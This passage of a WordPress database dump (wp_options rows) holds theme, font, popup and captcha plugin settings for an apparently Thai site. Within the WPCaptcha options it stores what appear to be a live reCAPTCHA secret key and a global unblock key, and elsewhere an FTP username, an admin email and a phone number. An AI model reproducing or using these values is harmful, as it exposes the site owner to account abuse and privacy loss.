min.css\";i:320;s:33:\"post-comments-count/style-rtl.css\";i:321;s:37:\"post-comments-count/style-rtl.min.css\";i:322;s:29:\"post-comments-count/style.css\";i:323;s:33:\"post-comments-count/style.min.css\";i:324;s:33:\"post-comments-form/editor-rtl.css\";i:325;s:37:\"post-comments-form/editor-rtl.min.css\";i:326;s:29:\"post-comments-form/editor.css\";i:327;s:33:\"post-comments-form/editor.min.css\";i:328;s:32:\"post-comments-form/style-rtl.css\";i:329;s:36:\"post-comments-form/style-rtl.min.css\";i:330;s:28:\"post-comments-form/style.css\";i:331;s:32:\"post-comments-form/style.min.css\";i:332;s:32:\"post-comments-link/style-rtl.css\";i:333;s:36:\"post-comments-link/style-rtl.min.css\";i:334;s:28:\"post-comments-link/style.css\";i:335;s:32:\"post-comments-link/style.min.css\";i:336;s:26:\"post-content/style-rtl.css\";i:337;s:30:\"post-content/style-rtl.min.css\";i:338;s:22:\"post-content/style.css\";i:339;s:26:\"post-content/style.min.css\";i:340;s:23:\"post-date/style-rtl.css\";i:341;s:27:\"post-date/style-rtl.min.css\";i:342;s:19:\"post-date/style.css\";i:343;s:23:\"post-date/style.min.css\";i:344;s:27:\"post-excerpt/editor-rtl.css\";i:345;s:31:\"post-excerpt/editor-rtl.min.css\";i:346;s:23:\"post-excerpt/editor.css\";i:347;s:27:\"post-excerpt/editor.min.css\";i:348;s:26:\"post-excerpt/style-rtl.css\";i:349;s:30:\"post-excerpt/style-rtl.min.css\";i:350;s:22:\"post-excerpt/style.css\";i:351;s:26:\"post-excerpt/style.min.css\";i:352;s:34:\"post-featured-image/editor-rtl.css\";i:353;s:38:\"post-featured-image/editor-rtl.min.css\";i:354;s:30:\"post-featured-image/editor.css\";i:355;s:34:\"post-featured-image/editor.min.css\";i:356;s:33:\"post-featured-image/style-rtl.css\";i:357;s:37:\"post-featured-image/style-rtl.min.css\";i:358;s:29:\"post-featured-image/style.css\";i:359;s:33:\"post-featured-image/style.min.css\";i:360;s:34:\"post-navigation-link/style-rtl.css\";i:361;s:38:\"post-navigation-link/style-rtl.min.css\";i:362;s:30:\"post-navigation-link/style.css\";i:363;s:34:\"post-navigation-link/style.min.css\";i:364;s:27:\"post-template/style-rtl.css\";i:365;s:31:\"post-template/style-rtl.min.css\";i:366;s:23:\"post-template/style.css\";i:367;s:27:\"post-template/style.min.css\";i:368;s:24:\"post-terms/style-rtl.css\";i:369;s:28:\"post-terms/style-rtl.min.css\";i:370;s:20:\"post-terms/style.css\";i:371;s:24:\"post-terms/style.min.css\";i:372;s:31:\"post-time-to-read/style-rtl.css\";i:373;s:35:\"post-time-to-read/style-rtl.min.css\";i:374;s:27:\"post-time-to-read/style.css\";i:375;s:31:\"post-time-to-read/style.min.css\";i:376;s:24:\"post-title/style-rtl.css\";i:377;s:28:\"post-title/style-rtl.min.css\";i:378;s:20:\"post-title/style.css\";i:379;s:24:\"post-title/style.min.css\";i:380;s:26:\"preformatted/style-rtl.css\";i:381;s:30:\"preformatted/style-rtl.min.css\";i:382;s:22:\"preformatted/style.css\";i:383;s:26:\"preformatted/style.min.css\";i:384;s:24:\"pullquote/editor-rtl.css\";i:385;s:28:\"pullquote/editor-rtl.min.css\";i:386;s:20:\"pullquote/editor.css\";i:387;s:24:\"pullquote/editor.min.css\";i:388;s:23:\"pullquote/style-rtl.css\";i:389;s:27:\"pullquote/style-rtl.min.css\";i:390;s:19:\"pullquote/style.css\";i:391;s:23:\"pullquote/style.min.css\";i:392;s:23:\"pullquote/theme-rtl.css\";i:393;s:27:\"pullquote/theme-rtl.min.css\";i:394;s:19:\"pullquote/theme.css\";i:395;s:23:\"pullquote/theme.min.css\";i:396;s:39:\"query-pagination-numbers/editor-rtl.css\";i:397;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:398;s:35:\"query-pagination-numbers/editor.css\";i:399;s:39:\"query-pagination-numbers/editor.min.css\";i:400;s:31:\"query-pagination/editor-rtl.css\";i:401;s:35:\"query-pagination/editor-rtl.min.css\";i:402;s:27:\"query-pagination/editor.css\";i:403;s:31:\"query-pagination/editor.min.css\";i:404;s:30:\"query-pagination/style-rtl.css\";i:405;s:34:\"query-pagination/style-rtl.min.css\";i:406;s:26:\"query-pagination/style.css\";i:407;s:30:\"query-pagination/style.min.css\";i:408;s:25:\"query-title/style-rtl.css\";i:409;s:29:\"query-title/style-rtl.min.css\";i:410;s:21:\"query-title/style.css\";i:411;s:25:\"query-title/style.min.css\";i:412;s:25:\"query-total/style-rtl.css\";i:413;s:29:\"query-total/style-rtl.min.css\";i:414;s:21:\"query-total/style.css\";i:415;s:25:\"query-total/style.min.css\";i:416;s:20:\"query/editor-rtl.css\";i:417;s:24:\"query/editor-rtl.min.css\";i:418;s:16:\"query/editor.css\";i:419;s:20:\"query/editor.min.css\";i:420;s:19:\"quote/style-rtl.css\";i:421;s:23:\"quote/style-rtl.min.css\";i:422;s:15:\"quote/style.css\";i:423;s:19:\"quote/style.min.css\";i:424;s:19:\"quote/theme-rtl.css\";i:425;s:23:\"quote/theme-rtl.min.css\";i:426;s:15:\"quote/theme.css\";i:427;s:19:\"quote/theme.min.css\";i:428;s:23:\"read-more/style-rtl.css\";i:429;s:27:\"read-more/style-rtl.min.css\";i:430;s:19:\"read-more/style.css\";i:431;s:23:\"read-more/style.min.css\";i:432;s:18:\"rss/editor-rtl.css\";i:433;s:22:\"rss/editor-rtl.min.css\";i:434;s:14:\"rss/editor.css\";i:435;s:18:\"rss/editor.min.css\";i:436;s:17:\"rss/style-rtl.css\";i:437;s:21:\"rss/style-rtl.min.css\";i:438;s:13:\"rss/style.css\";i:439;s:17:\"rss/style.min.css\";i:440;s:21:\"search/editor-rtl.css\";i:441;s:25:\"search/editor-rtl.min.css\";i:442;s:17:\"search/editor.css\";i:443;s:21:\"search/editor.min.css\";i:444;s:20:\"search/style-rtl.css\";i:445;s:24:\"search/style-rtl.min.css\";i:446;s:16:\"search/style.css\";i:447;s:20:\"search/style.min.css\";i:448;s:20:\"search/theme-rtl.css\";i:449;s:24:\"search/theme-rtl.min.css\";i:450;s:16:\"search/theme.css\";i:451;s:20:\"search/theme.min.css\";i:452;s:24:\"separator/editor-rtl.css\";i:453;s:28:\"separator/editor-rtl.min.css\";i:454;s:20:\"separator/editor.css\";i:455;s:24:\"separator/editor.min.css\";i:456;s:23:\"separator/style-rtl.css\";i:457;s:27:\"separator/style-rtl.min.css\";i:458;s:19:\"separator/style.css\";i:459;s:23:\"separator/style.min.css\";i:460;s:23:\"separator/theme-rtl.css\";i:461;s:27:\"separator/theme-rtl.min.css\";i:462;s:19:\"separator/theme.css\";i:463;s:23:\"separator/theme.min.css\";i:464;s:24:\"shortcode/editor-rtl.css\";i:465;s:28:\"shortcode/editor-rtl.min.css\";i:466;s:20:\"shortcode/editor.css\";i:467;s:24:\"shortcode/editor.min.css\";i:468;s:24:\"site-logo/editor-rtl.css\";i:469;s:28:\"site-logo/editor-rtl.min.css\";i:470;s:20:\"site-logo/editor.css\";i:471;s:24:\"site-logo/editor.min.css\";i:472;s:23:\"site-logo/style-rtl.css\";i:473;s:27:\"site-logo/style-rtl.min.css\";i:474;s:19:\"site-logo/style.css\";i:475;s:23:\"site-logo/style.min.css\";i:476;s:27:\"site-tagline/editor-rtl.css\";i:477;s:31:\"site-tagline/editor-rtl.min.css\";i:478;s:23:\"site-tagline/editor.css\";i:479;s:27:\"site-tagline/editor.min.css\";i:480;s:26:\"site-tagline/style-rtl.css\";i:481;s:30:\"site-tagline/style-rtl.min.css\";i:482;s:22:\"site-tagline/style.css\";i:483;s:26:\"site-tagline/style.min.css\";i:484;s:25:\"site-title/editor-rtl.css\";i:485;s:29:\"site-title/editor-rtl.min.css\";i:486;s:21:\"site-title/editor.css\";i:487;s:25:\"site-title/editor.min.css\";i:488;s:24:\"site-title/style-rtl.css\";i:489;s:28:\"site-title/style-rtl.min.css\";i:490;s:20:\"site-title/style.css\";i:491;s:24:\"site-title/style.min.css\";i:492;s:26:\"social-link/editor-rtl.css\";i:493;s:30:\"social-link/editor-rtl.min.css\";i:494;s:22:\"social-link/editor.css\";i:495;s:26:\"social-link/editor.min.css\";i:496;s:27:\"social-links/editor-rtl.css\";i:497;s:31:\"social-links/editor-rtl.min.css\";i:498;s:23:\"social-links/editor.css\";i:499;s:27:\"social-links/editor.min.css\";i:500;s:26:\"social-links/style-rtl.css\";i:501;s:30:\"social-links/style-rtl.min.css\";i:502;s:22:\"social-links/style.css\";i:503;s:26:\"social-links/style.min.css\";i:504;s:21:\"spacer/editor-rtl.css\";i:505;s:25:\"spacer/editor-rtl.min.css\";i:506;s:17:\"spacer/editor.css\";i:507;s:21:\"spacer/editor.min.css\";i:508;s:20:\"spacer/style-rtl.css\";i:509;s:24:\"spacer/style-rtl.min.css\";i:510;s:16:\"spacer/style.css\";i:511;s:20:\"spacer/style.min.css\";i:512;s:20:\"table/editor-rtl.css\";i:513;s:24:\"table/editor-rtl.min.css\";i:514;s:16:\"table/editor.css\";i:515;s:20:\"table/editor.min.css\";i:516;s:19:\"table/style-rtl.css\";i:517;s:23:\"table/style-rtl.min.css\";i:518;s:15:\"table/style.css\";i:519;s:19:\"table/style.min.css\";i:520;s:19:\"table/theme-rtl.css\";i:521;s:23:\"table/theme-rtl.min.css\";i:522;s:15:\"table/theme.css\";i:523;s:19:\"table/theme.min.css\";i:524;s:24:\"tag-cloud/editor-rtl.css\";i:525;s:28:\"tag-cloud/editor-rtl.min.css\";i:526;s:20:\"tag-cloud/editor.css\";i:527;s:24:\"tag-cloud/editor.min.css\";i:528;s:23:\"tag-cloud/style-rtl.css\";i:529;s:27:\"tag-cloud/style-rtl.min.css\";i:530;s:19:\"tag-cloud/style.css\";i:531;s:23:\"tag-cloud/style.min.css\";i:532;s:28:\"template-part/editor-rtl.css\";i:533;s:32:\"template-part/editor-rtl.min.css\";i:534;s:24:\"template-part/editor.css\";i:535;s:28:\"template-part/editor.min.css\";i:536;s:27:\"template-part/theme-rtl.css\";i:537;s:31:\"template-part/theme-rtl.min.css\";i:538;s:23:\"template-part/theme.css\";i:539;s:27:\"template-part/theme.min.css\";i:540;s:24:\"term-count/style-rtl.css\";i:541;s:28:\"term-count/style-rtl.min.css\";i:542;s:20:\"term-count/style.css\";i:543;s:24:\"term-count/style.min.css\";i:544;s:30:\"term-description/style-rtl.css\";i:545;s:34:\"term-description/style-rtl.min.css\";i:546;s:26:\"term-description/style.css\";i:547;s:30:\"term-description/style.min.css\";i:548;s:23:\"term-name/style-rtl.css\";i:549;s:27:\"term-name/style-rtl.min.css\";i:550;s:19:\"term-name/style.css\";i:551;s:23:\"term-name/style.min.css\";i:552;s:28:\"term-template/editor-rtl.css\";i:553;s:32:\"term-template/editor-rtl.min.css\";i:554;s:24:\"term-template/editor.css\";i:555;s:28:\"term-template/editor.min.css\";i:556;s:27:\"term-template/style-rtl.css\";i:557;s:31:\"term-template/style-rtl.min.css\";i:558;s:23:\"term-template/style.css\";i:559;s:27:\"term-template/style.min.css\";i:560;s:27:\"text-columns/editor-rtl.css\";i:561;s:31:\"text-columns/editor-rtl.min.css\";i:562;s:23:\"text-columns/editor.css\";i:563;s:27:\"text-columns/editor.min.css\";i:564;s:26:\"text-columns/style-rtl.css\";i:565;s:30:\"text-columns/style-rtl.min.css\";i:566;s:22:\"text-columns/style.css\";i:567;s:26:\"text-columns/style.min.css\";i:568;s:19:\"verse/style-rtl.css\";i:569;s:23:\"verse/style-rtl.min.css\";i:570;s:15:\"verse/style.css\";i:571;s:19:\"verse/style.min.css\";i:572;s:20:\"video/editor-rtl.css\";i:573;s:24:\"video/editor-rtl.min.css\";i:574;s:16:\"video/editor.css\";i:575;s:20:\"video/editor.min.css\";i:576;s:19:\"video/style-rtl.css\";i:577;s:23:\"video/style-rtl.min.css\";i:578;s:15:\"video/style.css\";i:579;s:19:\"video/style.min.css\";i:580;s:19:\"video/theme-rtl.css\";i:581;s:23:\"video/theme-rtl.min.css\";i:582;s:15:\"video/theme.css\";i:583;s:19:\"video/theme.min.css\";}}','yes'),
(124,'recovery_keys','a:0:{}','off'),
(126,'theme_mods_twentytwentyfour','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1722087322;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','off'),
(158,'finished_updating_comment_type','1','yes'),
(159,'ftp_credentials','a:3:{s:8:\"hostname\";s:9:\"localhost\";s:8:\"username\";s:4:\"w037\";s:15:\"connection_type\";s:3:\"ftp\";}','off'),
(164,'wp_calendar_block_has_published_posts','1','auto'),
(175,'current_theme','Plant','auto'),
(176,'theme_mods_plant','a:33:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:2;s:6:\"mobile\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:11:\"custom_logo\";i:13;s:14:\"footer_columns\";a:4:{i:0;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:1;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:2;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:3;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}}s:11:\"head_shadow\";b:1;s:13:\"header_effect\";s:4:\"none\";s:15:\"header_layout_m\";s:11:\"center-logo\";s:10:\"right_area\";s:6:\"search\";s:14:\"color_header_m\";b:1;s:11:\"menu_colors\";a:4:{s:4:\"text\";s:4:\"#222\";s:2:\"bg\";s:4:\"#222\";s:4:\"link\";s:9:\"#ffffffe6\";s:6:\"border\";s:9:\"#ffffff26\";}s:21:\"hide_arrowdown_mobile\";b:0;s:13:\"head_height_d\";s:4:\"80px\";s:18:\"head_logo_height_d\";s:4:\"60px\";s:10:\"color_body\";b:1;s:7:\"body_bg\";a:1:{s:4:\"home\";s:7:\"#ffc2c2\";}s:13:\"header_layout\";s:9:\"left-logo\";s:16:\"head_adjust_more\";b:0;s:18:\"header_center_menu\";b:0;s:14:\"buttons_enable\";b:1;s:16:\"buttons_channels\";a:3:{i:0;s:9:\"messenger\";i:1;s:6:\"mobile\";i:2;s:8:\"facebook\";}s:20:\"buttons_icon_message\";s:27:\"ติดต่อเรา\";s:21:\"buttons_messenger_url\";s:27:\"https://m.me/61556083436494\";s:25:\"buttons_messenger_tooltip\";s:37:\"ติดต่อ สอบถาม\";s:20:\"buttons_facebook_url\";s:40:\"https://www.facebook.com/profile.php?id=\";s:18:\"buttons_mobile_url\";s:10:\"0930701605\";s:14:\"consent_enable\";b:1;s:12:\"buttons_icon\";s:7:\"comment\";s:17:\"footer_bar_colors\";a:1:{s:4:\"link\";s:7:\"#ffffff\";}s:13:\"footer_bar_bg\";a:1:{s:16:\"background-color\";s:7:\"#000000\";}s:17:\"body_title_banner\";s:0:\"\";s:16:\"body_title_style\";s:6:\"banner\";s:14:\"header_style_m\";s:8:\"autoshow\";}','on'),
(177,'theme_switched','','auto'),
(180,'acf_version','6.2.0','auto'),
(182,'n2_ss3_version','3.5.1.19/b:release-3.5.1.19/r:4e06d1a7c4bae6a4e54c585b3749e7c169b51386','auto'),
(183,'widget_smartslider3','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(187,'_site_transient_wp_plugin_dependencies_plugin_data','a:0:{}','off'),
(203,'site_logo','13','auto'),
(205,'recently_activated','a:0:{}','off'),
(207,'generateblocks_dynamic_css_posts','a:0:{}','on'),
(208,'generateblocks_dynamic_css_time','1722087674','on'),
(209,'generateblocks_do_activation_redirect','1','auto'),
(211,'sgpb-dont-delete-data','1','auto'),
(212,'sgpbUnsubscribeColumnFixed','1','auto'),
(213,'SGPBUsageDays','0','auto'),
(214,'SGPBInstallDate','1722087675','auto'),
(215,'SGPBOpenNextTime','1724679675','auto'),
(216,'SGPBMaxOpenCount','80','auto'),
(217,'sgpbPopupBuilderRegisteredPlugins','{\"popup-builder\\/popup-builder.php\":{\"classPath\":\"popup-builder\\/com\\/classes\\/extension\\/SgpbPopupExtension.php\",\"className\":\"SgpbPopupExtension\",\"options\":[]}}','auto'),
(218,'SGPB_INACTIVE_EXTENSIONS','inactive','auto'),
(219,'kadence_blocks_schema_version','1','auto'),
(220,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(221,'stellarwp_telemetry_last_send','','auto'),
(222,'stellarwp_telemetry','a:1:{s:7:\"plugins\";a:1:{s:14:\"kadence-blocks\";a:2:{s:7:\"wp_slug\";s:33:\"kadence-blocks/kadence-blocks.php\";s:5:\"optin\";b:0;}}}','auto'),
(223,'stellarwp_telemetry_kadence-blocks_show_optin','1','auto'),
(225,'sgpb-all-notifications-data','[{\"priority\":1,\"type\":1,\"id\":\"sgpbMainRateUsNotification\",\"message\":\"\\t\\t<style>\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press{\\r\\n\\t\\t\\t\\tbox-sizing:border-box;\\r\\n\\t\\t\\t\\tcursor:pointer;\\r\\n\\t\\t\\t\\tdisplay:inline-block;\\r\\n\\t\\t\\t\\tfont-size:1em;\\r\\n\\t\\t\\t\\tmargin:0;\\r\\n\\t\\t\\t\\tpadding:0.5em 0.75em;\\r\\n\\t\\t\\t\\ttext-decoration:none;\\r\\n\\t\\t\\t\\ttransition:background 0.15s linear\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press-grey {\\r\\n\\t\\t\\t\\tbackground-color:#9E9E9E;\\r\\n\\t\\t\\t\\tborder:2px solid #9E9E9E;\\r\\n\\t\\t\\t\\tcolor: #FFF;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press-lightblue {\\r\\n\\t\\t\\t\\tbackground-color:#03A9F4;\\r\\n\\t\\t\\t\\tborder:2px solid #03A9F4;\\r\\n\\t\\t\\t\\tcolor: #FFF;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper {\\r\\n\\t\\t\\t\\ttext-align: center;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-wrapper{\\r\\n\\t\\t\\t\\ttext-align: center;\\r\\n\\t\\t\\t\\tpadding: 20px;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-wrapper p {\\r\\n\\t\\t\\t\\tcolor: black;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-h1 {\\r\\n\\t\\t\\t\\tfont-size: 22px;\\r\\n\\t\\t\\t\\tfont-weight: normal;\\r\\n\\t\\t\\t\\tline-height: 1.384;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-h2{\\r\\n\\t\\t\\t\\tfont-size: 20px;\\r\\n\\t\\t\\t\\tfont-weight: normal;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t:root {\\r\\n\\t\\t\\t\\t--main-bg-color: #1ac6ff;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-strong{\\r\\n\\t\\t\\t\\tcolor: var(--main-bg-color);\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-mt20{\\r\\n\\t\\t\\t\\tmargin-top: 20px\\r\\n\\t\\t\\t}\\r\\n\\t\\t<\\/style>\\r\\n\\t\\t<div class=\\\"sgpb-review-wrapper\\\">\\r\\n\\t\\t\\t<div class=\\\"sgpb-review-description\\\">\\r\\n\\t\\t\\t\\t<h1 class=\\\"sgpb-review-h1\\\"><strong class=\\\"sgrb-review-strong\\\">This is great!<\\/strong> We have noticed that you are using Popup Builder plugin on your site for 614 days, we are thankful for that.<\\/h1>\\t\\t\\t\\t<h2 class=\\\"sgrb-review-h2\\\">This is really great for your website score.<\\/h2>\\r\\n\\t\\t\\t\\t<p class=\\\"sgrb-review-mt20\\\">Have your input in the development of our plugin, and we\\u2019ll provide better conversions for your site!&lt;br \\/&gt; Leave your 5-star positive review and help us go further to the perfection!<\\/p>\\r\\n\\t\\t\\t<\\/div>\\r\\n\\t\\t\\t<div class=\\\"sgpb-buttons-wrapper\\\">\\r\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-1 sgpb-close-promo-notification\\\" data-action=\\\"sg-already-did-review\\\">I already did<\\/button>\\r\\n\\t\\t\\t\\t<button class=\\\"press press-lightblue sgpb-button-3 sgpb-close-promo-notification\\\" data-action=\\\"sg-you-worth-it\\\">You worth it!<\\/button>\\r\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-2 sgpb-close-promo-notification\\\" data-action=\\\"sg-show-popup-period\\\" data-message-type=\\\"days\\\">Maybe later<\\/button><\\/div>\\r\\n\\t\\t\\t<div>\\u00a0<\\/div>\\r\\n\\t\\t<\\/div>\\r\\n\\t\\t\"},{\"id\":\"sgpbMainSupportBanner\",\"priority\":1,\"type\":1,\"message\":\"<div class=\\\"sgpb-support-notification-wrapper sgpb-wrapper\\\"><h4 class=\\\"sgpb-support-notification-title\\\">Need some help?<\\/h4><h4 class=\\\"sgpb-support-notification-title\\\">Let us know what you think.<\\/h4><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\/reviews\\/\\\"><span class=\\\"dashicons sgpb-dashicons-heart sgpb-info-text-white\\\"><\\/span><span class=\\\"sg-info-text\\\">Rate Us<\\/span><\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/help.popup-builder.com\\\"><span class=\\\"dashicons sgpb-dashicons-megaphone sgpb-info-text-white\\\"><\\/span>Support Portal<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\\"><span class=\\\"dashicons sgpb-dashicons-admin-plugins sgpb-info-text-white\\\"><\\/span>Support Forum<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/popup-builder.com\\/\\\"><span class=\\\"dashicons sgpb-dashicons-editor-help sgpb-info-text-white\\\"><\\/span>LIVE chat<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"mailto:support@popup-builder.com?subject=Hello\\\"><span class=\\\"dashicons sgpb-dashicons-email-alt sgpb-info-text-white\\\"><\\/span>Email<\\/a><\\/div><div class=\\\"sgpb-support-notification-dont-show\\\">Bored of this?<a class=\\\"sgpb-dont-show-again-support-notification\\\" href=\\\"javascript:void(0)\\\"> Press here <\\/a>and we will not show it again!<\\/div>\"}]','auto'),
(226,'generateblocks_version','2.1.2','auto'),
(227,'sgpbModifiedRegisteredPluginsPaths2','1','auto'),
(228,'kadenceblocks_data_settings','a:4:{s:10:\"db_version\";i:0;s:15:\"version_history\";a:10:{i:1763003414;s:6:\"3.5.27\";i:1756200679;s:6:\"3.5.18\";i:1747895459;s:5:\"3.5.8\";i:1742185726;s:6:\"3.4.11\";i:1733973777;s:5:\"3.4.0\";i:1729697983;s:5:\"3.3.2\";i:1728529274;s:5:\"3.3.1\";i:1728051520;s:5:\"3.3.0\";i:1724822844;s:6:\"3.2.52\";i:0;s:3:\"new\";}s:13:\"prior_version\";s:6:\"3.5.18\";s:15:\"current_version\";s:6:\"3.5.27\";}','auto'),
(232,'pt_cv_version','4.3','auto'),
(237,'wpdb_kbp_form_entry_version','2019101613','auto'),
(238,'wpdb_kbp_form_entrymeta_version','2019101021','auto'),
(239,'kbp_is_installed','1','auto'),
(240,'kt_plugin_api_manager_instance_id','VtivNvBcu3cB','auto'),
(241,'seed_fonts_is_enabled','a:1:{i:0;s:2:\"on\";}','auto'),
(242,'seed_fonts_google_font_name','Kanit','auto'),
(243,'seed_fonts_font','ibm-plex-thai','auto'),
(244,'seed_fonts_weight','500','auto'),
(245,'seed_fonts_selectors','h1, h2, h3, h4, h5, h6, nav, .nav, .menu, button, .button, .btn, .price, ._heading, .wp-block-pullquote blockquote, blockquote, label, legend','auto'),
(246,'seed_fonts_is_important','a:1:{i:0;s:2:\"on\";}','auto'),
(247,'seed_fonts_css-generated','h1, h2, h3, h4, h5, h6, nav, .nav, .menu, button, .button, .btn, .price, ._heading, .wp-block-pullquote blockquote, blockquote, label, legend \r\n  font-family: ibm-plex-thai, san-serif !important;\r\n  font-weight: 500 !important;\r\n','auto'),
(248,'seed_fonts_body-css-generated','body \r\n  font-family: sarabun, san-serif !important;\r\n  font-size: 16px !important;\r\n  font-weight: 300 !important;\r\n  line-height: 1.6 !important;\r\n','auto'),
(251,'seed_fonts_body_is_enabled','a:1:{i:0;s:2:\"on\";}','auto'),
(252,'seed_fonts_body_google_font_name','Kanit','auto'),
(253,'seed_fonts_body_font','sarabun','auto'),
(254,'seed_fonts_body_weight','300','auto'),
(255,'seed_fonts_body_size','16','auto'),
(256,'seed_fonts_body_size_unit','px','auto'),
(257,'seed_fonts_body_lineheight','1.6','auto'),
(258,'seed_fonts_body_selectors','body','auto'),
(259,'seed_fonts_body_is_important','a:1:{i:0;s:2:\"on\";}','auto'),
(260,'new_admin_email','Outansama@gmail.com','auto'),
(273,'category_children','a:0:{}','auto'),
(275,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','off'),
(297,'wpcaptcha_meta','a:1:{s:12:\"database_ver\";s:4:\"1.31\";}','auto'),
(299,'wpcaptcha_options','a:77:{s:16:\"login_protection\";i:0;s:17:\"max_login_retries\";s:1:\"3\";s:14:\"retries_within\";s:1:\"5\";s:14:\"lockout_length\";s:2:\"60\";s:25:\"lockout_invalid_usernames\";i:0;s:17:\"mask_login_errors\";i:0;s:16:\"show_credit_link\";i:0;s:17:\"anonymous_logging\";i:0;s:10:\"block_bots\";i:0;s:13:\"log_passwords\";i:0;s:22:\"instant_block_nonusers\";i:0;s:15:\"cookie_lifetime\";i:14;s:21:\"country_blocking_mode\";i:0;s:26:\"country_blocking_countries\";s:0:\"\";s:28:\"block_undetermined_countries\";i:0;s:7:\"captcha\";s:11:\"recaptchav2\";s:18:\"captcha_secret_key\";s:40:\"6LcnrBkqAAAAABcq6jz167MgmchACMDaHW2lu-Ne\";s:16:\"captcha_site_key\";s:40:\"6LcnrBkqAAAAAPsJ1Ywfi5924iTJfdWEpVJvzZq-\";s:18:\"captcha_show_login\";s:1:\"1\";s:28:\"captcha_show_wp_registration\";s:1:\"1\";s:29:\"captcha_show_wp_lost_password\";s:1:\"1\";s:23:\"captcha_show_wp_comment\";s:1:\"1\";s:29:\"captcha_show_woo_registration\";i:0;s:25:\"captcha_show_woo_checkout\";i:0;s:29:\"captcha_show_edd_registration\";i:0;s:28:\"captcha_show_bp_registration\";i:0;s:9:\"login_url\";s:0:\"\";s:18:\"login_redirect_url\";s:0:\"\";s:12:\"global_block\";i:0;s:20:\"country_global_block\";i:0;s:16:\"uninstall_delete\";i:0;s:13:\"block_message\";s:87:\"We\'re sorry, but your IP has been blocked due to too many recent failed login attempts.\";s:21:\"block_message_country\";s:58:\"We\'re sorry, but access from your location is not allowed.\";s:18:\"global_unblock_key\";s:34:\"ll38e28f016a769aba5bd6ddd57d9bd5fc\";s:9:\"whitelist\";a:0:{}s:19:\"firewall_block_bots\";i:0;s:28:\"firewall_directory_traversal\";i:0;s:13:\"design_enable\";i:0;s:15:\"design_template\";s:6:\"orange\";s:23:\"design_background_color\";s:0:\"\";s:23:\"design_background_image\";s:0:\"\";s:11:\"design_logo\";s:0:\"\";s:15:\"design_logo_url\";s:0:\"\";s:17:\"design_logo_width\";s:0:\"\";s:18:\"design_logo_height\";s:0:\"\";s:25:\"design_logo_margin_bottom\";s:0:\"\";s:17:\"design_text_color\";s:7:\"#3c434a\";s:17:\"design_link_color\";s:7:\"#2271b1\";s:23:\"design_link_hover_color\";s:7:\"#135e96\";s:24:\"design_form_border_color\";s:7:\"#FFFFFF\";s:24:\"design_form_border_width\";i:1;s:17:\"design_form_width\";s:0:\"\";s:18:\"design_form_height\";s:0:\"\";s:19:\"design_form_padding\";i:26;s:25:\"design_form_border_radius\";i:2;s:28:\"design_form_background_color\";s:0:\"\";s:28:\"design_form_background_image\";s:0:\"\";s:22:\"design_label_font_size\";i:14;s:23:\"design_label_text_color\";s:7:\"#3c434a\";s:22:\"design_field_font_size\";i:13;s:23:\"design_field_text_color\";s:7:\"#3c434a\";s:25:\"design_field_border_color\";s:7:\"#8c8f94\";s:25:\"design_field_border_width\";i:1;s:26:\"design_field_border_radius\";i:2;s:29:\"design_field_background_color\";s:7:\"#ffffff\";s:23:\"design_button_font_size\";i:14;s:24:\"design_button_text_color\";s:0:\"\";s:26:\"design_button_border_color\";s:7:\"#2271b1\";s:26:\"design_button_border_width\";i:0;s:27:\"design_button_border_radius\";i:2;s:30:\"design_button_background_color\";s:7:\"#2271b1\";s:30:\"design_button_hover_text_color\";s:0:\"\";s:32:\"design_button_hover_border_color\";s:0:\"\";s:36:\"design_button_hover_background_color\";s:0:\"\";s:17:\"design_custom_css\";s:0:\"\";s:17:\"last_options_edit\";s:19:\"2024-07-27 14:57:26\";s:16:\"captcha_verified\";s:1:\"1\";}','auto'),
(488,'https_detection_errors','a:1:{s:20:\"https_request_failed\";a:1:{i:0;s:55:\"การร้องขอ HTTPS ล้มเหลว\";}}','off'),
(489,'_transient_health-check-site-status-result','{\"good\":16,\"recommended\":5,\"critical\":3}','on'),
